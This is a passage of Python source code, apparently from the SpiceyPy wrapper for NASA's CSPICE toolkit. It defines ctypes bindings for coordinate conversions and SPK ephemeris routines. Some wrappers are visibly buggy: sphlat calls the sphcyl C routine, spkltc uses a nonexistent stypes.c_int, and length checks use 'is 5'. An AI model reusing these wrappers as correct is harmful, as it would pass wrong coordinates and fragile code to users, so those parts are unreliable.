spoint, ctypes.byref(trgepc), srfvec, ctypes.byref(found))
return stypes.cVectorToPython(spoint), trgepc.value, stypes.cVectorToPython(
srfvec), bool(found.value)
@spiceErrorCheck
def size(cell):
"""
Return the size (maximum cardinality) of a SPICE cell of any
data type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/size_c.html
:param cell: Input cell.
:type cell: spiceypy.utils.support_types.SpiceCell
:return: The size of the input cell.
:rtype: int
"""
assert isinstance(cell, stypes.SpiceCell)
return libspice.size_c(ctypes.byref(cell))
@spiceErrorCheck
def spd():
"""
Return the number of seconds in a day.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spd_c.html
:return: The number of seconds in a day.
:rtype: float
"""
return libspice.spd_c()
@spiceErrorCheck
def sphcyl(radius, colat, slon):
"""
This routine converts from spherical coordinates to cylindrical
coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sphcyl_c.html
:param radius: Distance of point from origin.
:type radius: float
:param colat: Polar angle (co-latitude in radians) of point.
:type colat: float
:param slon: Azimuthal angle (longitude) of point (radians).
:type slon: float
:return:
Distance of point from z axis,
angle (radians) of point from XZ plane,
Height of point above XY plane.
:rtype: tuple
"""
radius = ctypes.c_double(radius)
colat = ctypes.c_double(colat)
slon = ctypes.c_double(slon)
r = ctypes.c_double()
lon = ctypes.c_double()
z = ctypes.c_double()
libspice.sphcyl_c(radius, colat, slon, ctypes.byref(r), ctypes.byref(lon),
ctypes.byref(z))
return r.value, lon.value, z.value
@spiceErrorCheck
def sphlat(r, colat, lons):
"""
Convert from spherical coordinates to latitudinal coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sphlat_c.html
:param r: Distance of the point from the origin.
:type r: float
:param colat: Angle of the point from positive z axis (radians).
:type colat: float
:param lons: Angle of the point from the XZ plane (radians).
:type lons: float
:return:
Distance of a point from the origin,
Angle of the point from the XZ plane in radians,
Angle of the point from the XY plane in radians.
:rtype: tuple
"""
r = ctypes.c_double(r)
colat = ctypes.c_double(colat)
lons = ctypes.c_double(lons)
radius = ctypes.c_double()
lon = ctypes.c_double()
lat = ctypes.c_double()
libspice.sphcyl_c(r, colat, lons, ctypes.byref(radius), ctypes.byref(lon),
ctypes.byref(lat))
return radius.value, lon.value, lat.value
@spiceErrorCheck
def sphrec(r, colat, lon):
"""
Convert from spherical coordinates to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sphrec_c.html
:param r: Distance of a point from the origin.
:type r: float
:param colat: Angle of the point from the positive Z-axis.
:type colat: float
:param lon: Angle of the point from the XZ plane in radians.
:type lon: float
:return: Rectangular coordinates of the point.
:rtype: 3-Element Array of floats
"""
r = ctypes.c_double(r)
colat = ctypes.c_double(colat)
lon = ctypes.c_double(lon)
rectan = stypes.emptyDoubleVector(3)
libspice.sphrec_c(r, colat, lon, rectan)
return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def spkacs(targ, et, ref, abcorr, obs):
"""
Return the state (position and velocity) of a target body
relative to an observer, optionally corrected for light time
and stellar aberration, expressed relative to an inertial
reference frame.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkacs_c.html
:param targ: Target body.
:type targ: int
:param et: Observer epoch.
:type et: float
:param ref: Inertial reference frame of output state.
:type ref: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obs: Observer.
:type obs: int
:return:
State of target,
One way light time between observer and target,
Derivative of light time with respect to time.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
obs = ctypes.c_int(obs)
starg = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
dlt = ctypes.c_double()
libspice.spkacs_c(targ, et, ref, abcorr, obs, starg, ctypes.byref(lt),
ctypes.byref(dlt))
return stypes.cVectorToPython(starg), lt.value, dlt.value
@spiceErrorCheck
def spkapo(targ, et, ref, sobs, abcorr):
"""
Return the position of a target body relative to an observer,
optionally corrected for light time and stellar aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkapo_c.html
:param targ: Target body.
:type targ: int
:param et: Observer epoch.
:type et: float
:param ref: Inertial reference frame of observer's state.
:type ref: str
:param sobs: State of observer wrt. solar system barycenter.
:type sobs: 6-Element Array of floats
:param abcorr: Aberration correction flag.
:type abcorr: str
:return:
Position of target,
One way light time between observer and target.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
sobs = stypes.toDoubleVector(sobs)
ptarg = stypes.emptyDoubleVector(3)
lt = ctypes.c_double()
libspice.spkapo_c(targ, et, ref, sobs, abcorr, ptarg, ctypes.byref(lt))
return stypes.cVectorToPython(ptarg), lt.value
@spiceErrorCheck
def spkapp(targ, et, ref, sobs, abcorr):
"""
Deprecated: This routine has been superseded by :func:`spkaps`. This
routine is supported for purposes of backward compatibility only.
Return the state (position and velocity) of a target body
relative to an observer, optionally corrected for light time and
stellar aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkapp_c.html
:param targ: Target body.
:type targ: int
:param et: Observer epoch.
:type et: float
:param ref: Inertial reference frame of observer's state.
:type ref: str
:param sobs: State of observer wrt. solar system barycenter.
:type sobs: 6-Element Array of floats
:param abcorr: Aberration correction flag.
:type abcorr: str
:return:
State of target,
One way light time between observer and target.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
sobs = stypes.toDoubleVector(sobs)
starg = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
libspice.spkapp_c(targ, et, ref, sobs, abcorr, starg, ctypes.byref(lt))
return stypes.cVectorToPython(starg), lt.value
@spiceErrorCheck
def spkaps(targ, et, ref, abcorr, stobs, accobs):
"""
Given the state and acceleration of an observer relative to the
solar system barycenter, return the state (position and velocity)
of a target body relative to the observer, optionally corrected
for light time and stellar aberration. All input and output
vectors are expressed relative to an inertial reference frame.
This routine supersedes :func:`spkapp`.
SPICE users normally should call the high-level API routines
:func:`spkezr` or :func:`spkez` rather than this routine.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkaps_c.html
:param targ: Target body.
:type targ: int
:param et: Observer epoch.
:type et: float
:param ref: Inertial reference frame of output state.
:type ref: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param stobs: State of the observer relative to the SSB.
:type stobs: 6-Element Array of floats
:param accobs: Acceleration of the observer relative to the SSB.
:type accobs: 6-Element Array of floats
:return:
State of target,
One way light time between observer and target,
Derivative of light time with respect to time.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
stobs = stypes.toDoubleVector(stobs)
accobs = stypes.toDoubleVector(accobs)
starg = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
dlt = ctypes.c_double()
libspice.spkaps_c(targ, et, ref, abcorr, stobs, accobs, starg,
ctypes.byref(lt), ctypes.byref(dlt))
return stypes.cVectorToPython(starg), lt.value, dlt.value
@spiceErrorCheck
def spk14a(handle, ncsets, coeffs, epochs):
"""
Add data to a type 14 SPK segment associated with handle. See
also :func:`spk14b` and :func:`spk14e`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spk14a_c.html
:param handle: The handle of an SPK file open for writing.
:type handle: int
:param ncsets: The number of coefficient sets and epochs.
:type ncsets: int
:param coeffs: The collection of coefficient sets.
:type coeffs: Array of floats
:param epochs: The epochs associated with the coefficient sets.
:type epochs: Array of floats
"""
handle = ctypes.c_int(handle)
ncsets = ctypes.c_int(ncsets)
coeffs = stypes.toDoubleVector(coeffs)
epochs = stypes.toDoubleVector(epochs)
libspice.spk14a_c(handle, ncsets, coeffs, epochs)
@spiceErrorCheck
def spk14b(handle, segid, body, center, framename, first, last, chbdeg):
"""
Begin a type 14 SPK segment in the SPK file associated with
handle. See also :func:`spk14a` and :func:`spk14e`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spk14b_c.html
:param handle: The handle of an SPK file open for writing.
:type handle: int
:param segid: The string to use for segment identifier.
:type segid: str
:param body: The NAIF ID code for the body of the segment.
:type body: int
:param center: The center of motion for body.
:type center: int
:param framename: The reference frame for this segment.
:type framename: str
:param first: The first epoch for which the segment is valid.
:type first: float
:param last: The last epoch for which the segment is valid.
:type last: float
:param chbdeg: The degree of the Chebyshev Polynomial used.
:type chbdeg: int
"""
handle = ctypes.c_int(handle)
segid = stypes.stringToCharP(segid)
body = ctypes.c_int(body)
center = ctypes.c_int(center)
framename = stypes.stringToCharP(framename)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
chbdeg = ctypes.c_int(chbdeg)
libspice.spk14b_c(handle, segid, body, center, framename, first, last,
chbdeg)
@spiceErrorCheck
def spk14e(handle):
"""
End the type 14 SPK segment currently being written to the SPK
file associated with handle. See also :func:`spk14a` and :func:`spk14b`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spk14e_c.html
:param handle: The handle of an SPK file open for writing.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.spk14e_c(handle)
@spiceErrorCheck
def spkcls(handle):
"""
Close an open SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcls_c.html
:param handle: Handle of the SPK file to be closed.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.spkcls_c(handle)
@spiceErrorCheck
def spkcov(spk, idcode, cover):
"""
Find the coverage window for a specified ephemeris object in a
specified SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcov_c.html
:param spk: Name of SPK file.
:type spk: str
:param idcode: ID code of ephemeris object.
:type idcode: int
:param cover: Window giving coverage in "spk" for "idcode".
:type cover: spiceypy.utils.support_types.SpiceCell
"""
spk = stypes.stringToCharP(spk)
idcode = ctypes.c_int(idcode)
assert isinstance(cover, stypes.SpiceCell)
assert cover.dtype == 1
libspice.spkcov_c(spk, idcode, ctypes.byref(cover))
@spiceErrorCheck
def spkcpo(target, et, outref, refloc, abcorr, obspos, obsctr, obsref):
"""
Return the state of a specified target relative to an "observer,"
where the observer has constant position in a specified reference
frame. The observer's position is provided by the calling program
rather than by loaded SPK files.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcpo_c.html
:param target: Name of target ephemeris object.
:type target: str
:param et: Observation epoch.
:type et: float
:param outref: Reference frame of output state.
:type outref: str
:param refloc: Output reference frame evaluation locus.
:type refloc: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obspos: Observer position relative to center of motion.
:type obspos: 3-Element Array of floats
:param obsctr: Center of motion of observer.
:type obsctr: str
:param obsref: Frame of observer position.
:type obsref: str
:return:
State of target with respect to observer,
One way light time between target and observer.
:rtype: tuple
"""
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
outref = stypes.stringToCharP(outref)
refloc = stypes.stringToCharP(refloc)
abcorr = stypes.stringToCharP(abcorr)
obspos = stypes.toDoubleVector(obspos)
obsctr = stypes.stringToCharP(obsctr)
obsref = stypes.stringToCharP(obsref)
state = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
libspice.spkcpo_c(target, et, outref, refloc, abcorr, obspos, obsctr,
obsref, state, ctypes.byref(lt))
return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkcpt(trgpos, trgctr, trgref, et, outref, refloc, abcorr, obsrvr):
"""
Return the state, relative to a specified observer, of a target
having constant position in a specified reference frame. The
target's position is provided by the calling program rather than by
loaded SPK files.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcpt_c.html
:param trgpos: Target position relative to center of motion.
:type trgpos: 3-Element Array of floats
:param trgctr: Center of motion of target.
:type trgctr: str
:param trgref: Observation epoch.
:type trgref: str
:param et: Observation epoch.
:type et: float
:param outref: Reference frame of output state.
:type outref: str
:param refloc: Output reference frame evaluation locus.
:type refloc: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing ephemeris object.
:return:
State of target with respect to observer,
One way light time between target and observer.
:rtype: tuple
"""
trgpos = stypes.toDoubleVector(trgpos)
trgctr = stypes.stringToCharP(trgctr)
trgref = stypes.stringToCharP(trgref)
et = ctypes.c_double(et)
outref = stypes.stringToCharP(outref)
refloc = stypes.stringToCharP(refloc)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
state = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
libspice.spkcpt_c(trgpos, trgctr, trgref, et, outref, refloc, abcorr,
obsrvr, state, ctypes.byref(lt))
return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkcvo(target, et, outref, refloc, abcorr, obssta, obsepc, obsctr, obsref):
"""
Return the state of a specified target relative to an "observer,"
where the observer has constant velocity in a specified reference
frame. The observer's state is provided by the calling program
rather than by loaded SPK files.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcvo_c.html
:param target: Name of target ephemeris object.
:type target: str
:param et: Observation epoch.
:type et: float
:param outref: Reference frame of output state.
:type outref: str
:param refloc: Output reference frame evaluation locus.
:type refloc: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obssta: Observer state relative to center of motion.
:type obssta: 6-Element Array of floats
:param obsepc: Epoch of observer state.
:type obsepc: float
:param obsctr: Center of motion of observer.
:type obsctr: str
:param obsref: Frame of observer state.
:type obsref: str
:return:
State of target with respect to observer,
One way light time between target and observer.
:rtype: tuple
"""
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
outref = stypes.stringToCharP(outref)
refloc = stypes.stringToCharP(refloc)
abcorr = stypes.stringToCharP(abcorr)
obssta = stypes.toDoubleVector(obssta)
obsepc = ctypes.c_double(obsepc)
obsctr = stypes.stringToCharP(obsctr)
obsref = stypes.stringToCharP(obsref)
state = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
libspice.spkcvo_c(target, et, outref, refloc, abcorr, obssta, obsepc,
obsctr, obsref, state, ctypes.byref(lt))
return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkcvt(trgsta, trgepc, trgctr, trgref, et, outref, refloc, abcorr, obsrvr):
"""
Return the state, relative to a specified observer, of a target
having constant velocity in a specified reference frame. The
target's state is provided by the calling program rather than by
loaded SPK files.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkcvt_c.html
:param trgsta: Target state relative to center of motion.
:type trgsta: 6-Element Array of floats
:param trgepc: Epoch of target state.
:type trgepc: float
:param trgctr: Center of motion of target.
:type trgctr: str
:param trgref: Frame of target state.
:type trgref: str
:param et: Observation epoch.
:type et: float
:param outref: Reference frame of output state.
:type outref: str
:param refloc: Output reference frame evaluation locus.
:type refloc: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing ephemeris object.
:type obsrvr: str
:return:
State of target with respect to observer,
One way light time between target and observer.
:rtype: tuple
"""
trgpos = stypes.toDoubleVector(trgsta)
trgepc = ctypes.c_double(trgepc)
trgctr = stypes.stringToCharP(trgctr)
trgref = stypes.stringToCharP(trgref)
et = ctypes.c_double(et)
outref = stypes.stringToCharP(outref)
refloc = stypes.stringToCharP(refloc)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
state = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
libspice.spkcvt_c(trgpos, trgepc, trgctr, trgref, et, outref, refloc,
abcorr, obsrvr, state, ctypes.byref(lt))
return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkez(targ, et, ref, abcorr, obs):
"""
Return the state (position and velocity) of a target body
relative to an observing body, optionally corrected for light
time (planetary aberration) and stellar aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkez_c.html
:param targ: Target body.
:type targ: int
:param et: Observer epoch.
:type et: float
:param ref: Reference frame of output state vector.
:type ref: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obs: Observing body.
:type obs: int
:return:
State of target,
One way light time between observer and target.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
obs = ctypes.c_int(obs)
starg = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
libspice.spkez_c(targ, et, ref, abcorr, obs, starg, ctypes.byref(lt))
return stypes.cVectorToPython(starg), lt.value
@spiceErrorCheck
def spkezp(targ, et, ref, abcorr, obs):
"""
Return the position of a target body relative to an observing
body, optionally corrected for light time (planetary aberration)
and stellar aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkezp_c.html
:param targ: Target body NAIF ID code.
:type targ: int
:param et: Observer epoch.
:type et: float
:param ref: Reference frame of output position vector.
:type ref: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obs: Observing body NAIF ID code.
:type obs: int
:return:
Position of target,
One way light time between observer and target.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
obs = ctypes.c_int(obs)
ptarg = stypes.emptyDoubleVector(3)
lt = ctypes.c_double()
libspice.spkezp_c(targ, et, ref, abcorr, obs, ptarg, ctypes.byref(lt))
return stypes.cVectorToPython(ptarg), lt.value
@spiceErrorCheck
def spkezr(targ, et, ref, abcorr, obs):
"""
Return the state (position and velocity) of a target body
relative to an observing body, optionally corrected for light
time (planetary aberration) and stellar aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkezr_c.html
:param targ: Target body name.
:type targ: str
:param et: Observer epoch.
:type et: Union[float,Iterable[float]]
:param ref: Reference frame of output state vector.
:type ref: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obs: Observing body name.
:type obs: str
:return:
State of target,
One way light time between observer and target.
:rtype: tuple
"""
targ = stypes.stringToCharP(targ)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
obs = stypes.stringToCharP(obs)
starg = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
if hasattr(et, "__iter__"):
states = []
times = []
for t in et:
libspice.spkezr_c(targ, ctypes.c_double(t), ref, abcorr, obs, starg, ctypes.byref(lt))
checkForSpiceError(None)
states.append(stypes.cVectorToPython(starg))
times.append(lt.value)
return states, times
else:
libspice.spkezr_c(targ, ctypes.c_double(et), ref, abcorr, obs, starg, ctypes.byref(lt))
return stypes.cVectorToPython(starg), lt.value
@spiceErrorCheck
def spkgeo(targ, et, ref, obs):
"""
Compute the geometric state (position and velocity) of a target
body relative to an observing body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkgeo_c.html
:param targ: Target body.
:type targ: int
:param et: Target epoch.
:type et: float
:param ref: Target reference frame.
:type ref: str
:param obs: Observing body.
:type obs: int
:return: State of target, Light time.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
obs = ctypes.c_int(obs)
state = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
libspice.spkgeo_c(targ, et, ref, obs, state, ctypes.byref(lt))
return stypes.cVectorToPython(state), lt.value
@spiceErrorCheck
def spkgps(targ, et, ref, obs):
"""
Compute the geometric position of a target body relative to an
observing body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkgps_c.html
:param targ: Target body.
:type targ: int
:param et: Target epoch.
:type et: float
:param ref: Target reference frame.
:type ref: str
:param obs: Observing body.
:type obs: int
:return: Position of target, Light time.
:rtype: tuple
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
obs = ctypes.c_int(obs)
position = stypes.emptyDoubleVector(3)
lt = ctypes.c_double()
libspice.spkgps_c(targ, et, ref, obs, position, ctypes.byref(lt))
return stypes.cVectorToPython(position), lt.value
@spiceErrorCheck
def spklef(filename):
"""
Load an ephemeris file for use by the readers. Return that file's
handle, to be used by other SPK routines to refer to the file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spklef_c.html
:param filename: Name of the file to be loaded.
:type filename: str
:return: Loaded file's handle.
:rtype: int
"""
filename = stypes.stringToCharP(filename)
handle = ctypes.c_int()
libspice.spklef_c(filename, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def spkltc(targ, et, ref, abcorr, stobs):
"""
Return the state (position and velocity) of a target body
relative to an observer, optionally corrected for light time,
expressed relative to an inertial reference frame.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkltc_c.html
:param targ: Target body.
:type targ: int
:param et: Observer epoch.
:type et: float
:param ref: Inertial reference frame of output state.
:type ref: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param stobs: State of the observer relative to the SSB.
:type stobs: 6-Element Array of floats
:return:
One way light time between observer and target,
Derivative of light time with respect to time
:rtype: tuple
"""
assert len(stobs) == 6
targ = stypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
stobs = stypes.toDoubleVector(stobs)
starg = stypes.emptyDoubleVector(6)
lt = ctypes.c_double()
dlt = ctypes.c_double()
libspice.spkltc_c(targ, et, ref, abcorr, stobs, starg, ctypes.byref(lt),
ctypes.byref(dlt))
return stypes.cVectorToPython(starg), lt.value, dlt.value
@spiceErrorCheck
def spkobj(spk, outCell=None):
"""
Find the set of ID codes of all objects in a specified SPK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkobj_c.html
:param spk: Name of SPK file.
:type spk: str
:param outCell: Optional Spice Int Cell.
:type outCell: spiceypy.utils.support_types.SpiceCell
"""
spk = stypes.stringToCharP(spk)
if not outCell:
outCell = stypes.SPICEINT_CELL(1000)
assert isinstance(outCell, stypes.SpiceCell)
assert outCell.dtype == 2
libspice.spkobj_c(spk, ctypes.byref(outCell))
return outCell
@spiceErrorCheck
def spkopa(filename):
"""
Open an existing SPK file for subsequent write.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkopa_c.html
:param filename: The name of an existing SPK file.
:type filename: str
:return: A handle attached to the SPK file opened to append.
:rtype: int
"""
filename = stypes.stringToCharP(filename)
handle = ctypes.c_int()
libspice.spkopa_c(filename, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def spkopn(filename, ifname, ncomch):
"""
Create a new SPK file, returning the handle of the opened file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkopn_c.html
:param filename: The name of the new SPK file to be created.
:type filename: str
:param ifname: The internal filename for the SPK file.
:type ifname: str
:param ncomch: The number of characters to reserve for comments.
:type ncomch: int
:return: The handle of the opened SPK file.
:rtype: int
"""
filename = stypes.stringToCharP(filename)
ifname = stypes.stringToCharP(ifname)
ncomch = ctypes.c_int(ncomch)
handle = ctypes.c_int()
libspice.spkopn_c(filename, ifname, ncomch, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def spkpds(body, center, framestr, typenum, first, last):
"""
Perform routine error checks and if all check pass, pack the
descriptor for an SPK segment
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkpds_c.html
:param body: The NAIF ID code for the body of the segment.
:type body: int
:param center: The center of motion for body.
:type center: int
:param framestr: The frame for this segment.
:type framestr: str
:param typenum: The type of SPK segment to create.
:type typenum: int
:param first: The first epoch for which the segment is valid.
:type first: float
:param last: The last epoch for which the segment is valid.
:type last: float
:return: An SPK segment descriptor.
:rtype: 5-Element Array of floats
"""
body = ctypes.c_int(body)
center = ctypes.c_int(center)
framestr = stypes.stringToCharP(framestr)
typenum = ctypes.c_int(typenum)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
descr = stypes.emptyDoubleVector(5)
libspice.spkpds_c(body, center, framestr, typenum, first, last, descr)
return stypes.cVectorToPython(descr)
@spiceErrorCheck
def spkpos(targ, et, ref, abcorr, obs):
"""
Return the position of a target body relative to an observing
body, optionally corrected for light time (planetary aberration)
and stellar aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkpos_c.html
:param targ: Target body name.
:type targ: str
:param et: Observer epoch.
:type et: Union[float,Iterable[float]]
:param ref: Reference frame of output position vector.
:type ref: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obs: Observing body name.
:type obs: str
:return:
Position of target,
One way light time between observer and target.
:rtype: tuple
"""
targ = stypes.stringToCharP(targ)
ref = stypes.stringToCharP(ref)
abcorr = stypes.stringToCharP(abcorr)
obs = stypes.stringToCharP(obs)
ptarg = stypes.emptyDoubleVector(3)
lt = ctypes.c_double()
if hasattr(et, "__iter__"):
ptargs = []
lts = []
for t in et:
libspice.spkpos_c(targ, t, ref, abcorr, obs, ptarg, ctypes.byref(lt))
checkForSpiceError(None)
ptargs.append(stypes.cVectorToPython(ptarg))
lts.append(lt.value)
return ptargs, lts
else:
libspice.spkpos_c(targ, et, ref, abcorr, obs, ptarg, ctypes.byref(lt))
return stypes.cVectorToPython(ptarg), lt.value
@spiceErrorCheck
def spkpvn(handle, descr, et):
"""
For a specified SPK segment and time, return the state (position and
velocity) of the segment's target body relative to its center of
motion.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkpvn_c.html
:param handle: File handle.
:type handle: int
:param descr: Segment descriptor.
:type descr: 5-Element Array of floats
:param et: Evaluation epoch.
:type et: float
:return:
Segment reference frame ID code,
Output state vector,
Center of state.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
descr = stypes.toDoubleVector(descr)
et = ctypes.c_double(et)
ref = ctypes.c_int()
state = stypes.emptyDoubleVector(6)
center = ctypes.c_int()
libspice.spkpvn_c(handle, descr, et, ctypes.byref(ref), state,
ctypes.byref(center))
return ref.value, stypes.cVectorToPython(state), center.value
@spiceErrorCheck
@spiceFoundExceptionThrower
def spksfs(body, et, idlen):
# spksfs has a Parameter SIDLEN,
# sounds like an optional but is that possible?
"""
Search through loaded SPK files to find the highest-priority segment
applicable to the body and time specified.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spksfs_c.html
:param body: Body ID.
:type body: int
:param et: Ephemeris time.
:type et: float
:param idlen: Length of output segment ID string.
:type idlen: int
:return:
Handle of file containing the applicable segment,
Descriptor of the applicable segment,
Identifier of the applicable segment.
:rtype: tuple
"""
body = ctypes.c_int(body)
et = ctypes.c_double(et)
idlen = ctypes.c_int(idlen)
handle = ctypes.c_int()
descr = stypes.emptyDoubleVector(5)
identstring = stypes.stringToCharP(idlen)
found = ctypes.c_int()
libspice.spksfs_c(body, et, idlen, ctypes.byref(handle), descr, identstring,
ctypes.byref(found))
return handle.value, stypes.cVectorToPython(descr), \
stypes.toPythonString(identstring), bool(found.value)
@spiceErrorCheck
def spkssb(targ, et, ref):
"""
Return the state (position and velocity) of a target body
relative to the solar system barycenter.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkssb_c.html
:param targ: Target body.
:type targ: int
:param et: Target epoch.
:type et: float
:param ref: Target reference frame.
:type ref: str
:return: State of target.
:rtype: 6-Element Array of floats
"""
targ = ctypes.c_int(targ)
et = ctypes.c_double(et)
ref = stypes.stringToCharP(ref)
starg = stypes.emptyDoubleVector(6)
libspice.spkssb_c(targ, et, ref, starg)
return stypes.cVectorToPython(starg)
@spiceErrorCheck
def spksub(handle, descr, identin, begin, end, newh):
"""
Extract a subset of the data in an SPK segment into a
separate segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spksub_c.html
:param handle: Handle of source segment.
:type handle: int
:param descr: Descriptor of source segment.
:type descr: 5-Element Array of floats
:param identin: Indentifier of source segment.
:type identin: str
:param begin: Beginning (initial epoch) of subset.
:type begin: int
:param end: End (fincal epoch) of subset.
:type end: int
:param newh: Handle of new segment.
:type newh: int
"""
assert len(descr) is 5
handle = ctypes.c_int(handle)
descr = stypes.toDoubleVector(descr)
identin = stypes.stringToCharP(identin)
begin = ctypes.c_double(begin)
end = ctypes.c_double(end)
newh = ctypes.c_int(newh)
libspice.spksub_c(handle, descr, identin, begin, end, newh)
@spiceErrorCheck
def spkuds(descr):
"""
Unpack the contents of an SPK segment descriptor.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkuds_c.html
:param descr: An SPK segment descriptor.
:type descr: 5-Element Array of floats
:return:
The NAIF ID code for the body of the segment,
The center of motion for body,
The ID code for the frame of this segment,
The type of SPK segment,
The first epoch for which the segment is valid,
The last epoch for which the segment is valid,
Beginning DAF address of the segment,
Ending DAF address of the segment.
:rtype: tuple
"""
assert len(descr) is 5
descr = stypes.toDoubleVector(descr)
body = ctypes.c_int()
center = ctypes.c_int()
framenum = ctypes.c_int()
typenum = ctypes.c_int()
first = ctypes.c_double()
last = ctypes.c_double()
begin = ctypes.c_int()
end = ctypes.c_int()
libspice.spkuds_c(descr, ctypes.byref(body), ctypes.byref(center),
ctypes.byref(framenum), ctypes.byref(typenum),
ctypes.byref(first), ctypes.byref(last),
ctypes.byref(begin), ctypes.byref(end))
return body.value, center.value, framenum.value, typenum.value, \
first.value, last.value, begin.value, end.value
@spiceErrorCheck
def spkuef(handle):
"""
Unload an ephemeris file so that it will no longer be searched by
the readers.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkuef_c.html
:param handle: Handle of file to be unloaded
:type handle: int
"""
handle = ctypes.c_int(handle)
